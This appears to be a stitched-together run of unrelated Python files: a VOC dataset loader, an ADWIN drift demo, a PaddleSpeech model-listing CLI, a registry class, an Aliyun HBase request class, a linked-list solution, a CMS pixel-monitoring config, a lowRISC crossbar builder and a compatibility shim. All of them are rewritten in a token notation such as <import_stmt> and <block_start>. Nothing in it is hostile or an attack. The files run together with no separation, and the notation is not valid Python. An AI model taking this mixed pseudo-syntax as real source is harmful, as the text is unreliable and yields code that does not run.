<import_stmt>logging<import_stmt>os<import_stmt>numpy<as>np<import_stmt>xml.etree.ElementTree<as>ET<import_from_stmt>PIL Image<import_from_stmt>paths DATASETS_ROOT<line_sep>log=logging.getLogger()<line_sep>VOC_CATS=['__background__' 'aeroplane' 'bicycle' 'bird' 'boat' 'bottle' 'bus' 'car' 'cat' 'chair' 'cow' 'diningtable' 'dog' 'horse' 'motorbike' 'person' 'pottedplant' 'sheep' 'sofa' 'train' 'tvmonitor']<class_stmt>VOCLoader()<block_start><def_stmt>__init__ self year split segmentation=<false> augmented_seg=<false><block_start><assert_stmt>year<in>['07' '12']<line_sep>self.dataset='voc'<line_sep>self.year=year<line_sep>self.root=os.path.join(DATASETS_ROOT 'VOCdevkit/VOC20%s/'%year)<line_sep>self.split=split<assert_stmt>split<in>['train' 'val' 'trainval' 'test']<line_sep>cats=VOC_CATS<line_sep>self.cats_to_ids=dict(map(reversed enumerate(cats)))<line_sep>self.ids_to_cats=dict(enumerate(cats))<line_sep>self.num_classes=len(cats)<line_sep>self.categories=cats[1:]<line_sep>self.segmentation=segmentation<line_sep>self.augmented_seg=augmented_seg<assert_stmt><not>self.segmentation<or>self.segmentation<and>self.year<eq>'12'<if_stmt>self.augmented_seg<block_start>filelist='ImageSets/SegmentationAug/%s.txt'<block_end><elif_stmt>self.segmentation<block_start>filelist='ImageSets/Segmentation/%s.txt'<block_end><else_stmt><block_start>filelist='ImageSets/Main/%s.txt'<block_end><with_stmt>open(os.path.join(self.root filelist%self.split) 'r')<as>f<block_start>self.filenames=f.read().split('\n')[:-1]<block_end>log.info("Created a loader VOC%s %s with %i images"%(year split len(self.filenames)))<block_end><def_stmt>load_image self name<block_start>im=Image.open('%sJPEGImages/%s.jpg'%(self.root name)).convert('RGB')<line_sep>im=np.array(im)/255.0<line_sep>im=im.astype(np.float32)<line_sep><return>im<block_end><def_stmt>get_filenames self<block_start><return>self.filenames<block_end><def_stmt>read_annotations self name<block_start>bboxes=[]<line_sep>cats=[]<line_sep>tree=ET.parse('%sAnnotations/%s.xml'%(self.root name))<line_sep>root=tree.getroot()<line_sep>width=int(root.find('size/width').text)<line_sep>height=int(root.find('size/height').text)<line_sep>difficulty=[]<for_stmt>obj root.findall('object')<block_start>cat=self.cats_to_ids[obj.find('name').text]<line_sep>difficult=(int(obj.find('difficult').text)<ne>0)<line_sep>difficulty.append(difficult)<line_sep>cats.append(cat)<line_sep>bbox_tag=obj.find('bndbox')<line_sep>x=int(bbox_tag.find('xmin').text)<line_sep>y=int(bbox_tag.find('ymin').text)<line_sep>w=int(bbox_tag.find('xmax').text)-x<line_sep>h=int(bbox_tag.find('ymax').text)-y<line_sep>bboxes.append((x y w h))<block_end>gt_cats=np.array(cats)<line_sep>gt_bboxes=np.array(bboxes).reshape((len(bboxes) 4))<line_sep>difficulty=np.array(difficulty)<line_sep>seg_gt=self.read_segmentations(name height width)<line_sep>output=gt_bboxes seg_gt gt_cats width height difficulty<line_sep><return>output<block_end><def_stmt>read_segmentations self name height width<block_start><if_stmt>self.segmentation<block_start><try_stmt><block_start>seg_folder=self.root+'SegmentationClass/'<line_sep>seg_file=seg_folder+name+'.png'<line_sep>seg_map=Image.open(seg_file)<block_end><except_stmt><block_start><assert_stmt>self.augmented_seg<line_sep>seg_folder=self.root+'SegmentationClassAug/'<line_sep>seg_file=seg_folder+name+'.png'<line_sep>seg_map=Image.open(seg_file)<block_end>segmentation=np.array(seg_map dtype=np.uint8)<block_end><else_stmt># if there is no segmentation for a particular image we fill the mask # with zeros to keep the same amount of tensors but don't learn from it <block_start>segmentation=np.zeros([height width] dtype=np.uint8)+255<block_end><return>segmentation<block_end><block_end>
<import_stmt>numpy<as>np<import_from_stmt>skmultiflow.drift_detection ADWIN<def_stmt>demo <block_start>""" _test_adwin In this demo, an ADWIN object evaluates a sequence of numbers corresponding to 2 distributions. The ADWIN object indicates the indices where change is detected. The first half of the data is a sequence of randomly generated 0's and 1's. The second half of the data is a normal distribution of integers from 0 to 7. """<line_sep>adwin=ADWIN()<line_sep>size=2000<line_sep>change_start=999<line_sep>np.random.seed(1)<line_sep>data_stream=np.random.randint(2 size=size)<line_sep>data_stream[change_start:]=np.random.randint(8 size=size-change_start)<for_stmt>i range(size)<block_start>adwin.add_element(data_stream[i])<if_stmt>adwin.detected_change()<block_start>print('Change has been detected in data: '+str(data_stream[i])+' - of index: '+str(i))<block_end><block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>demo()<block_end>
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. <import_stmt>argparse<import_from_stmt>typing List<import_from_stmt>prettytable PrettyTable<import_from_stmt>..utils cli_register<import_from_stmt>..utils stats_wrapper<line_sep>__all__=['StatsExecutor']<line_sep>model_name_format={'asr':'Model-Language-Sample Rate' 'cls':'Model-Sample Rate' 'st':'Model-Source language-Target language' 'text':'Model-Task-Language' 'tts':'Model-Language' 'vector':'Model-Sample Rate'}<line_sep>@cli_register(name='paddlespeech.stats' description='Get speech tasks support models list.')<class_stmt>StatsExecutor()<block_start><def_stmt>__init__ self<block_start>super().__init__()<line_sep>self.parser=argparse.ArgumentParser(prog='paddlespeech.stats' add_help=<true>)<line_sep>self.task_choices=['asr' 'cls' 'st' 'text' 'tts' 'vector']<line_sep>self.parser.add_argument('--task' type=str default='asr' choices=self.task_choices help='Choose speech task.' required=<true>)<block_end><def_stmt>show_support_models self pretrained_models:dict<block_start>fields=model_name_format[self.task].split("-")<line_sep>table=PrettyTable(fields)<for_stmt>key pretrained_models<block_start>table.add_row(key.split("-"))<block_end>print(table)<block_end><def_stmt>execute self argv:List[str]<arrow>bool<block_start>""" Command line entry. """<line_sep>parser_args=self.parser.parse_args(argv)<line_sep>has_exceptions=<false><try_stmt><block_start>self(parser_args.task)<block_end><except_stmt>Exception<as>e<block_start>has_exceptions=<true><block_end><if_stmt>has_exceptions<block_start><return><false><block_end><else_stmt><block_start><return><true><block_end><block_end>@stats_wrapper<def_stmt>__call__ self task:str=<none> <block_start>""" Python API to call an executor. """<line_sep>self.task=task<if_stmt>self.task<not><in>self.task_choices<block_start>print("Please input correct speech task, choices = "+str(self.task_choices))<block_end><elif_stmt>self.task<eq>'asr'<block_start><try_stmt><block_start><import_from_stmt>..asr.pretrained_models pretrained_models<line_sep>print("Here is the list of ASR pretrained models released by PaddleSpeech that can be used by command line and python API")<line_sep>self.show_support_models(pretrained_models)<block_end><except_stmt>BaseException<block_start>print("Failed to get the list of ASR pretrained models.")<block_end><block_end><elif_stmt>self.task<eq>'cls'<block_start><try_stmt><block_start><import_from_stmt>..cls.pretrained_models pretrained_models<line_sep>print("Here is the list of CLS pretrained models released by PaddleSpeech that can be used by command line and python API")<line_sep>self.show_support_models(pretrained_models)<block_end><except_stmt>BaseException<block_start>print("Failed to get the list of CLS pretrained models.")<block_end><block_end><elif_stmt>self.task<eq>'st'<block_start><try_stmt><block_start><import_from_stmt>..st.pretrained_models pretrained_models<line_sep>print("Here is the list of ST pretrained models released by PaddleSpeech that can be used by command line and python API")<line_sep>self.show_support_models(pretrained_models)<block_end><except_stmt>BaseException<block_start>print("Failed to get the list of ST pretrained models.")<block_end><block_end><elif_stmt>self.task<eq>'text'<block_start><try_stmt><block_start><import_from_stmt>..text.pretrained_models pretrained_models<line_sep>print("Here is the list of TEXT pretrained models released by PaddleSpeech that can be used by command line and python API")<line_sep>self.show_support_models(pretrained_models)<block_end><except_stmt>BaseException<block_start>print("Failed to get the list of TEXT pretrained models.")<block_end><block_end><elif_stmt>self.task<eq>'tts'<block_start><try_stmt><block_start><import_from_stmt>..tts.pretrained_models pretrained_models<line_sep>print("Here is the list of TTS pretrained models released by PaddleSpeech that can be used by command line and python API")<line_sep>self.show_support_models(pretrained_models)<block_end><except_stmt>BaseException<block_start>print("Failed to get the list of TTS pretrained models.")<block_end><block_end><elif_stmt>self.task<eq>'vector'<block_start><try_stmt><block_start><import_from_stmt>..vector.pretrained_models pretrained_models<line_sep>print("Here is the list of Speaker Recognition pretrained models released by PaddleSpeech that can be used by command line and python API")<line_sep>self.show_support_models(pretrained_models)<block_end><except_stmt>BaseException<block_start>print("Failed to get the list of Speaker Recognition pretrained models.")<block_end><block_end><block_end><block_end>
# # Copyright 2019 Xilinx Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # """Registry mechanism for "registering" classes/functions for general use. This is typically used with a decorator that calls Register for adding a class or function to a registry. """<import_from_future_stmt> absolute_import<import_from_future_stmt> division<import_from_future_stmt> print_function<class_stmt>Registry(object)<block_start>"""Provides a registry for saving objects."""<def_stmt>__init__ self name<block_start>"""Creates a new registry."""<line_sep>self._name=name<line_sep>self._registry={}<block_end><def_stmt>register self obj name=<none><block_start>"""Registers a Python object "obj" for the given "name". Args: obj: The object to add to the registry. name: An optional string specifying the registry key for the obj. If None, obj.__name__ will be used. Raises: KeyError: If same name is registered twice. """<if_stmt><not>name<block_start>name=obj.__name__<block_end><if_stmt>name<in>self._registry<block_start><raise>KeyError("Name '%s' has been registered in '%s'!"%(name self._name))<block_end># logging.vlog(1, "Registering %s (%s) in %s.", name, obj, self._name) self._registry[name]=obj<block_end><def_stmt>list self<block_start>"""Lists registered items. Returns: A list of names of registered objects. """<line_sep><return>self._registry.keys()<block_end><def_stmt>lookup self name<block_start>"""Looks up "name". Args: name: a string specifying the registry key for the obj. Returns: Registered object if found Raises: LookupError: if "name" has not been registered. """<if_stmt>name<in>self._registry<block_start><return>self._registry[name]<block_end><else_stmt><block_start><raise>LookupError("%s registry has no entry for: %s"%(self._name name))<block_end><block_end><block_end>
# Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # # http://www.apache.org/licenses/LICENSE-2.0 # # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. <import_from_stmt>aliyunsdkcore.request RpcRequest<import_from_stmt>aliyunsdkhbase.endpoint endpoint_data<class_stmt>CreateClusterRequest(RpcRequest)<block_start><def_stmt>__init__ self<block_start>RpcRequest.__init__(self 'HBase' '2019-01-01' 'CreateCluster' 'hbase')<line_sep>self.set_method('POST')<if_stmt>hasattr(self "endpoint_map")<block_start>setattr(self "endpoint_map" endpoint_data.getEndpointMap())<block_end><if_stmt>hasattr(self "endpoint_regional")<block_start>setattr(self "endpoint_regional" endpoint_data.getEndpointRegional())<block_end><block_end><def_stmt>get_ClusterName self<block_start><return>self.get_query_params().get('ClusterName')<block_end><def_stmt>set_ClusterName self ClusterName<block_start>self.add_query_param('ClusterName' ClusterName)<block_end><def_stmt>get_ClientToken self<block_start><return>self.get_query_params().get('ClientToken')<block_end><def_stmt>set_ClientToken self ClientToken<block_start>self.add_query_param('ClientToken' ClientToken)<block_end><def_stmt>get_EngineVersion self<block_start><return>self.get_query_params().get('EngineVersion')<block_end><def_stmt>set_EngineVersion self EngineVersion<block_start>self.add_query_param('EngineVersion' EngineVersion)<block_end><def_stmt>get_ResourceGroupId self<block_start><return>self.get_query_params().get('ResourceGroupId')<block_end><def_stmt>set_ResourceGroupId self ResourceGroupId<block_start>self.add_query_param('ResourceGroupId' ResourceGroupId)<block_end><def_stmt>get_Engine self<block_start><return>self.get_query_params().get('Engine')<block_end><def_stmt>set_Engine self Engine<block_start>self.add_query_param('Engine' Engine)<block_end><def_stmt>get_AutoRenewPeriod self<block_start><return>self.get_query_params().get('AutoRenewPeriod')<block_end><def_stmt>set_AutoRenewPeriod self AutoRenewPeriod<block_start>self.add_query_param('AutoRenewPeriod' AutoRenewPeriod)<block_end><def_stmt>get_Period self<block_start><return>self.get_query_params().get('Period')<block_end><def_stmt>set_Period self Period<block_start>self.add_query_param('Period' Period)<block_end><def_stmt>get_DiskSize self<block_start><return>self.get_query_params().get('DiskSize')<block_end><def_stmt>set_DiskSize self DiskSize<block_start>self.add_query_param('DiskSize' DiskSize)<block_end><def_stmt>get_EncryptionKey self<block_start><return>self.get_query_params().get('EncryptionKey')<block_end><def_stmt>set_EncryptionKey self EncryptionKey<block_start>self.add_query_param('EncryptionKey' EncryptionKey)<block_end><def_stmt>get_MasterInstanceType self<block_start><return>self.get_query_params().get('MasterInstanceType')<block_end><def_stmt>set_MasterInstanceType self MasterInstanceType<block_start>self.add_query_param('MasterInstanceType' MasterInstanceType)<block_end><def_stmt>get_DiskType self<block_start><return>self.get_query_params().get('DiskType')<block_end><def_stmt>set_DiskType self DiskType<block_start>self.add_query_param('DiskType' DiskType)<block_end><def_stmt>get_VSwitchId self<block_start><return>self.get_query_params().get('VSwitchId')<block_end><def_stmt>set_VSwitchId self VSwitchId<block_start>self.add_query_param('VSwitchId' VSwitchId)<block_end><def_stmt>get_SecurityIPList self<block_start><return>self.get_query_params().get('SecurityIPList')<block_end><def_stmt>set_SecurityIPList self SecurityIPList<block_start>self.add_query_param('SecurityIPList' SecurityIPList)<block_end><def_stmt>get_ColdStorageSize self<block_start><return>self.get_query_params().get('ColdStorageSize')<block_end><def_stmt>set_ColdStorageSize self ColdStorageSize<block_start>self.add_query_param('ColdStorageSize' ColdStorageSize)<block_end><def_stmt>get_PeriodUnit self<block_start><return>self.get_query_params().get('PeriodUnit')<block_end><def_stmt>set_PeriodUnit self PeriodUnit<block_start>self.add_query_param('PeriodUnit' PeriodUnit)<block_end><def_stmt>get_CoreInstanceType self<block_start><return>self.get_query_params().get('CoreInstanceType')<block_end><def_stmt>set_CoreInstanceType self CoreInstanceType<block_start>self.add_query_param('CoreInstanceType' CoreInstanceType)<block_end><def_stmt>get_VpcId self<block_start><return>self.get_query_params().get('VpcId')<block_end><def_stmt>set_VpcId self VpcId<block_start>self.add_query_param('VpcId' VpcId)<block_end><def_stmt>get_NodeCount self<block_start><return>self.get_query_params().get('NodeCount')<block_end><def_stmt>set_NodeCount self NodeCount<block_start>self.add_query_param('NodeCount' NodeCount)<block_end><def_stmt>get_ZoneId self<block_start><return>self.get_query_params().get('ZoneId')<block_end><def_stmt>set_ZoneId self ZoneId<block_start>self.add_query_param('ZoneId' ZoneId)<block_end><def_stmt>get_PayType self<block_start><return>self.get_query_params().get('PayType')<block_end><def_stmt>set_PayType self PayType<block_start>self.add_query_param('PayType' PayType)<block_end><block_end>
# Definition for singly-linked list. # class ListNode(object): # def __init__(self, x): # self.val = x # self.next = None <class_stmt>Solution(object)<block_start><def_stmt>middleNode self head<block_start>""" :type head: ListNode :rtype: ListNode """<if_stmt><not>head<block_start><return><none><block_end>fastRuner,slowRuner=head head<while_stmt>fastRuner<and>fastRuner.next<block_start>fastRuner=fastRuner.next.next<line_sep>slowRuner=slowRuner.next<block_end><return>slowRuner<block_end><block_end>
<import_stmt>FWCore.ParameterSet.Config<as>cms<import_from_stmt>DQMServices.Core.DQMEDHarvester DQMEDHarvester<import_from_stmt>DQM.SiPixelPhase1Common.HistogramManager_cfi *<import_stmt>DQM.SiPixelPhase1Common.TriggerEventFlag_cfi<as>trigger<line_sep>SiPixelPhase1TrackEfficiencyValid=DefaultHistoTrack.clone(name="valid" title="Valid Hits" range_min=0 range_max=50 range_nbins=50 xlabel="valid hits" dimensions=0 specs=VPSet(StandardSpecifications1D_Num #StandardSpecification2DProfile_Num, #for this we have the on track clusters map (i.e the same thing) Specification().groupBy("PXBarrel/PXLayer/Event")#this will produce inclusive counts per Layer/Disk .reduce("COUNT").groupBy("PXBarrel/PXLayer").save(nbins=50 xmin=0 xmax=1500) Specification().groupBy("PXForward/PXDisk/Event").reduce("COUNT").groupBy("PXForward/PXDisk/").save(nbins=50 xmin=0 xmax=1500) ))<line_sep>SiPixelPhase1TrackEfficiencyInactive=DefaultHistoTrack.clone(name="inactive" title="Inactive Hits" xlabel="inactive hits" range_min=0 range_max=25 range_nbins=25 dimensions=0 specs=VPSet(StandardSpecification2DProfile_Num Specification().groupBy("PXBarrel/PXLayer/Event")#this will produce inclusive counts per Layer/Disk .reduce("COUNT").groupBy("PXBarrel/PXLayer").save(nbins=50 xmin=0 xmax=100) Specification().groupBy("PXForward/PXDisk/Event").reduce("COUNT").groupBy("PXForward/PXDisk/").save(nbins=50 xmin=0 xmax=100) ))<line_sep>SiPixelPhase1TrackEfficiencyMissing=DefaultHistoTrack.clone(name="missing" title="Missing Hits" range_min=0 range_max=25 range_nbins=25 xlabel="missing hits" dimensions=0 specs=VPSet(StandardSpecifications1D_Num StandardSpecification2DProfile_Num Specification().groupBy("PXBarrel/PXLayer/Event")#this will produce inclusive counts per Layer/Disk .reduce("COUNT").groupBy("PXBarrel/PXLayer").save(nbins=50 xmin=0 xmax=100) Specification().groupBy("PXForward/PXDisk/Event").reduce("COUNT").groupBy("PXForward/PXDisk/").save(nbins=50 xmin=0 xmax=100) ))<line_sep>SiPixelPhase1TrackEfficiencyEfficiency=SiPixelPhase1TrackEfficiencyValid.clone(name="hitefficiency" title="Hit Efficiency" xlabel="#valid/(#valid+#missing)" dimensions=1 specs=VPSet(StandardSpecification2DProfile #profiles per layer and shell Specification(PerLadder).groupBy("PXBarrel/Shell/PXLayer/SignedLadder").reduce("MEAN").groupBy("PXBarrel/Shell/PXLayer" "EXTEND_X").save() Specification(PerLadder).groupBy("PXForward/HalfCylinder/PXRing/PXDisk/SignedBlade").reduce("MEAN").groupBy("PXForward/HalfCylinder/PXRing/PXDisk" "EXTEND_X").save() #per layer Specification().groupBy("PXBarrel/PXLayer").reduce("MEAN").groupBy("PXBarrel" "EXTEND_X").save() Specification().groupBy("PXForward/PXDisk").reduce("MEAN").groupBy("PXForward" "EXTEND_X").save() Specification(PerLayer2D).groupBy("PXBarrel/PXLayer/Lumisection").groupBy("PXBarrel/PXLayer" "EXTEND_X").groupBy("PXBarrel" "EXTEND_Y").reduce("MEAN").save() Specification(PerLayer2D).groupBy("PXForward/PXDisk/Lumisection").groupBy("PXForward/PXDisk" "EXTEND_X").groupBy("PXForward" "EXTEND_Y").reduce("MEAN").save() ))<line_sep>SiPixelPhase1TrackEfficiencyVertices=DefaultHistoTrack.clone(name="num_vertices" title="PrimaryVertices" xlabel="# Vertices" dimensions=1 range_min=-0.5 range_max=100.5 range_nbins=101 specs=VPSet(Specification().groupBy("").save() Specification().groupBy("/Lumisection").reduce("MEAN").groupBy("" "EXTEND_X").save()))<import_from_stmt>Configuration.Eras.Modifier_run3_common_cff run3_common<line_sep>run3_common.toModify(SiPixelPhase1TrackEfficiencyVertices range_max=150.5 range_nbins=151)<line_sep>SiPixelPhase1TrackEfficiencyConf=cms.VPSet(SiPixelPhase1TrackEfficiencyValid SiPixelPhase1TrackEfficiencyMissing SiPixelPhase1TrackEfficiencyInactive SiPixelPhase1TrackEfficiencyEfficiency SiPixelPhase1TrackEfficiencyVertices)<import_from_stmt>DQMServices.Core.DQMEDAnalyzer DQMEDAnalyzer<line_sep>SiPixelPhase1TrackEfficiencyAnalyzer=DQMEDAnalyzer('SiPixelPhase1TrackEfficiency' clusters=cms.InputTag("siPixelClusters") tracks=cms.InputTag("generalTracks") trajectoryInput=cms.InputTag("refittedForPixelDQM") primaryvertices=cms.InputTag("offlinePrimaryVertices") tracker=cms.InputTag("MeasurementTrackerEvent") histograms=SiPixelPhase1TrackEfficiencyConf geometry=SiPixelPhase1Geometry triggerflags=trigger.SiPixelPhase1Triggers VertexCut=cms.untracked.bool(<true>))<line_sep>SiPixelPhase1TrackEfficiencyHarvester=DQMEDHarvester("SiPixelPhase1Harvester" histograms=SiPixelPhase1TrackEfficiencyConf geometry=SiPixelPhase1Geometry)<line_sep>
# Copyright lowRISC contributors. # Licensed under the Apache License, Version 2.0, see LICENSE for details. # SPDX-License-Identifier: Apache-2.0 <import_stmt>logging<as>log<import_from_stmt>.item Node NodeType<import_from_stmt>.xbar Xbar<def_stmt>elaborate xbar:Xbar<arrow>bool<block_start>"""elaborate reads all nodes and edges then construct internal FIFOs, Sockets. """<line_sep># Condition check <if_stmt>len(xbar.nodes)<le>1<or>len(xbar.edges)<eq>0<block_start>log.error("# of Nodes is less than 2 or no Edge exists. Cannot proceed.")<line_sep><return><false><block_end><for_stmt>host xbar.hosts<block_start>process_node(host xbar)<line_sep>log.info("Node Processed: "+repr(xbar))<block_end># Pipeline process_pipeline(xbar)<line_sep># Build address map # Each socket_1n should have address map <return><true><block_end><def_stmt>process_node node xbar# node: Node -> xbar: Xbar -> Xbar <block_start>"""process each node based on algorithm 1. If a node has different clock from main clock and not ASYNC_FIFO: a. (New Node) Create ASYNC_FIFO node. b. Revise every edges from the node to have start node as ASYNC_FIFO node. (New Edge) create a edge from the node to ASYNC_FIFO node. - Repeat the algorithm with ASYNC_FIFO node. c. Revise every edges to the node to have end node as ASYNC_FIFO node. (New Edge) create a edge from ASYNC_FIFO node to the node. d. If it is not DEVICE, HOST node, raise Error. If it is DEVICE, end (next item). 2. If a node has multiple edges having it as a end node and not SOCKET_M1: a. (New node) Create SOCKET_M1 node. b. Revise every edges to the node to have SOCKET_M1 node as end node. c. (New Edge) create a edge from SOCKET_M1 to the node. d. Repeat the algorithm with the node. 3. If a node has multiple edges having it as a start node and not SOCKET_1N: a. (New node) Create SOCKET_1N node. b. Revise every edges from the node to have SOCKET_1N node as start node. c. (New Edge) Create a edge from the node to SOCKET_1N node. d. (for loop) Repeat the algorithm with SOCKET_1N's other side node. """<line_sep># If a node has different clock from main clock and not ASYNC_FIFO: <if_stmt>node.node_type<ne>NodeType.ASYNC_FIFO<and>node.clocks[0]<ne>xbar.clock# (New Node) Create ASYNC_FIFO node <block_start>new_node=Node(name="asf_"+str(len(xbar.nodes)) node_type=NodeType.ASYNC_FIFO clock=xbar.clock reset=xbar.reset)<line_sep># if node is HOST, host clock synchronizes into xbar domain # if node is DEVICE, xbar synchronizes into device clock domain <if_stmt>node.node_type<eq>NodeType.HOST<block_start>new_node.clocks.insert(0 node.clocks[0])<line_sep>new_node.resets.insert(0 node.resets[0])<block_end><else_stmt><block_start>new_node.clocks.append(node.clocks[0])<line_sep>new_node.resets.append(node.resets[0])<block_end>xbar.insert_node(new_node node)<line_sep>process_node(new_node xbar)<block_end># If a node has multiple edges having it as a end node and not SOCKET_M1: <elif_stmt>node.node_type<ne>NodeType.SOCKET_M1<and>len(node.us)<g>1# (New node) Create SOCKET_M1 node <block_start>new_node=Node(name="sm1_"+str(len(xbar.nodes)) node_type=NodeType.SOCKET_M1 clock=xbar.clock reset=xbar.reset)<line_sep># By default, assume connecting to SOCKET_1N upstream and bypass all FIFOs # If upstream requires pipelining, it will be added through process pipeline new_node.hdepth=0<line_sep>new_node.hpass=2<power>len(node.us)-1<line_sep>new_node.ddepth=0<line_sep>new_node.dpass=1<line_sep>xbar.insert_node(new_node node)<line_sep>process_node(new_node xbar)<block_end># If a node has multiple edges having it as a start node and not SOCKET_1N: <elif_stmt>node.node_type<ne>NodeType.SOCKET_1N<and>len(node.ds)<g>1# (New node) Create SOCKET_1N node <block_start>new_node=Node(name="s1n_"+str(len(xbar.nodes)) node_type=NodeType.SOCKET_1N clock=xbar.clock reset=xbar.reset)<line_sep># By default, assume connecting to SOCKET_M1 downstream and bypass all FIFOs # If upstream requires pipelining, it will be added through process pipeline new_node.hdepth=0<line_sep>new_node.hpass=1<line_sep>new_node.ddepth=0<line_sep>new_node.dpass=2<power>len(node.ds)-1<line_sep>xbar.insert_node(new_node node)<line_sep># (for loop) Repeat the algorithm with SOCKET_1N's other side node <for_stmt>edge new_node.ds<block_start>process_node(edge.ds xbar)<block_end><block_end><return>xbar<block_end><def_stmt>process_pipeline xbar<block_start>"""Check if HOST, DEVICE has settings different from default, then propagate it to end """<for_stmt>host xbar.hosts# go downstream and change the HReqPass/Depth at the first instance. # If it is async, skip. # If Socket 1N, # if pipeline True and bypass false, set hpass to 0 # if pipeline is False, set depth to 0 # If Socket M1, find position of the host and follow procedure above # If it is device, it means host and device are directly connected. Ignore now. <block_start>log.info("Processing pipeline for host {}".format(host.name))<line_sep># FIFO present with no passthrough option # FIFO present with passthrough option # FIFO not present and full passthrough full_fifo=<false><line_sep>fifo_passthru=<false><line_sep>full_passthru=<true><if_stmt>host.pipeline<is><true><and>host.pipeline_byp<is><false><block_start>full_fifo=<true><block_end><elif_stmt>host.pipeline<is><true><and>host.pipeline_byp<is><true><block_start>fifo_passthru=<true><block_end><elif_stmt>host.pipeline<is><false><block_start>full_passthru=<true><block_end>dnode=host.ds[0].ds<if_stmt>dnode.node_type<eq>NodeType.ASYNC_FIFO<block_start><continue><block_end><if_stmt>dnode.node_type<eq>NodeType.SOCKET_1N<block_start><if_stmt>full_fifo<block_start>dnode.hpass=0<line_sep>dnode.hdepth=2<block_end><elif_stmt>fifo_passthru<block_start>dnode.hpass=0<line_sep>dnode.hdepth=2<block_end><elif_stmt>full_passthru<block_start>dnode.hpass=1<line_sep>dnode.hdepth=0<block_end>log.info("Finished processing socket1n {}, pass={}, depth={}".format(dnode.name dnode.hpass dnode.hdepth))<block_end><elif_stmt>dnode.node_type<eq>NodeType.SOCKET_M1<block_start>idx=dnode.us.index(host.ds[0])<if_stmt>full_fifo<block_start>log.info("fifo present no bypass")<line_sep>dnode.hpass=dnode.hpass&~(1<lshift>idx)<line_sep>dnode.hdepth=dnode.hdepth|(2<lshift>idx<times>4)<block_end><elif_stmt>fifo_passthru<block_start>log.info("fifo present with bypass")<line_sep>dnode.hpass=dnode.hpass|(1<lshift>idx)<line_sep>dnode.hdepth=dnode.hdepth|(2<lshift>idx<times>4)<block_end><elif_stmt>full_passthru<block_start>log.info("fifo not present")<line_sep>dnode.hpass=dnode.hpass|(1<lshift>idx)<line_sep>dnode.hdepth=dnode.hdepth&~(0xF<lshift>idx<times>4)<block_end>log.info("Finished processing socketm1 {}, pass={}, depth={}".format(dnode.name dnode.hpass dnode.hdepth))<block_end><block_end><for_stmt>device xbar.devices# go upstream and set DReq/RspPass at the first instance. # If it is async, skip # If Socket M1 # If pipeline True and bypass False, set dpass to 0 # If pipeline False, set depth to 0 # If Socket 1N, find position of the device and follow procedure above # If it is host, ignore <block_start>log.info("Processing pipeline for device {}".format(device.name))<line_sep># FIFO present with no passthrough option # FIFO present with passthrough option # FIFO not present and full passthrough full_fifo=<false><line_sep>fifo_passthru=<false><line_sep>full_passthru=<true><if_stmt>device.pipeline<is><true><and>device.pipeline_byp<is><false><block_start>full_fifo=<true><block_end><elif_stmt>device.pipeline<is><true><and>device.pipeline_byp<is><true><block_start>fifo_passthru=<true><block_end><elif_stmt>device.pipeline<is><false><block_start>full_passthru=<true><block_end>unode=device.us[0].us<if_stmt>unode.node_type<eq>NodeType.ASYNC_FIFO<block_start><continue><block_end><if_stmt>unode.node_type<eq>NodeType.SOCKET_1N<block_start>idx=unode.ds.index(device.us[0])<if_stmt>full_fifo<block_start>unode.dpass=unode.dpass&~(1<lshift>idx)<line_sep>unode.ddepth=unode.ddepth|(2<lshift>idx<times>4)<block_end><elif_stmt>fifo_passthru<block_start>unode.dpass=unode.dpass|(1<lshift>idx)<line_sep>unode.ddepth=unode.ddepth|(2<lshift>idx<times>4)<block_end><elif_stmt>full_passthru<block_start>unode.dpass=unode.dpass|(1<lshift>idx)<line_sep>unode.ddepth=unode.ddepth&~(0xF<lshift>idx<times>4)<block_end>log.info("Finished processing socket1n {}, pass={:x}, depth={:x}".format(unode.name unode.dpass unode.ddepth))<block_end><elif_stmt>unode.node_type<eq>NodeType.SOCKET_M1<block_start><if_stmt>full_fifo<block_start>log.info("Fifo present with no passthrough")<line_sep>unode.dpass=0<line_sep>unode.ddepth=2<block_end><elif_stmt>fifo_passthru<block_start>log.info("Fifo present with passthrough")<line_sep>unode.dpass=0<line_sep>unode.ddepth=2<block_end><elif_stmt>full_passthru<block_start>log.info("No Fifo")<line_sep>unode.dpass=1<line_sep>unode.ddepth=0<block_end>log.info("Finished processing socketm1 {}, pass={:x}, depth={:x}".format(unode.name unode.dpass unode.ddepth))<block_end><block_end><return>xbar<block_end>
# -*- coding: utf-8 -*- """ lassie.compat ~~~~~~~~~~~~~ This module contains imports and declarations for seamless Python 2 and Python 3 compatibility. """<import_stmt>sys<line_sep>_ver=sys.version_info<line_sep>#: Python 2.x? is_py2=(_ver[0]<eq>2)<line_sep>#: Python 3.x? is_py3=(_ver[0]<eq>3)<if_stmt>is_py2<block_start><import_from_stmt>urlparse urljoin urlparse<line_sep>str=unicode<block_end><elif_stmt>is_py3<block_start><import_from_stmt>urllib.parse urljoin urlparse<line_sep>str=str<block_end>
